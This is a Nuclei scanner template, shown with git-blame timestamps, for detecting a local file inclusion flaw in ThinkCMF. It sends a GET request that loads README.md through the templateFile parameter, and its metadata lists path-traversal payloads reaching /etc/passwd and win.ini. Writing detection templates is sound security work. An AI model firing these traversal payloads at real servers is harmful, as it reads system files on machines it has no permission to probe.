2021-02-11 15:46:20 +00:00
|
|
|
id: thinkcmf-lfi
|
|
|
|
|
|
|
|
info:
|
2022-08-05 13:57:51 +00:00
|
|
|
name: ThinkCMF - Local File Inclusion
|
2021-02-11 15:46:20 +00:00
|
|
|
author: pikpikcu
|
|
|
|
severity: high
|
2022-08-05 13:57:51 +00:00
|
|
|
description: ThinkCMF is vulnerable to local file inclusion.
|
2022-04-22 10:38:41 +00:00
|
|
|
reference:
|
|
|
|
- https://www.freebuf.com/vuls/217586.html
|
2022-08-05 13:57:51 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
|
|
cvss-score: 7.5
|
|
|
|
cwe-id: CWE-22
|
2023-10-14 11:27:55 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 1
|
|
|
|
win-payload: ../../../../../../../../../../../../../../../../windows/win.ini
|
|
|
|
unix-payload: ../../../../../../../../../../../../../../../../etc/passwd
|
2022-04-22 10:38:41 +00:00
|
|
|
tags: thinkcmf,lfi
|
2021-02-11 15:46:20 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2021-02-11 15:46:20 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
2021-09-30 14:52:53 +00:00
|
|
|
- "{{BaseURL}}/?a=display&templateFile=README.md"
|
2021-02-11 15:46:20 +00:00
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
2021-09-30 14:52:53 +00:00
|
|
|
- type: word
|
|
|
|
condition: and
|
|
|
|
words:
|
|
|
|
- "ThinkCMF"
|
|
|
|
- "## README"
|
|
|
|
- "## UPDATE"
|
2021-02-11 15:46:20 +00:00
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2023-10-20 11:41:13 +00:00
|
|
|
|
|
|
|
# digest: 490a00463044022035ae17d9262499d8c4df87fb43d174d27e8dc9d41cd2bcd39d80e143ecb8f79502204091475b206c1d68b7603e7fb7d435764b689ec85a8cc7c8083bcfcb81a85e44:922c64590222798bb761d5b6d8e72950
|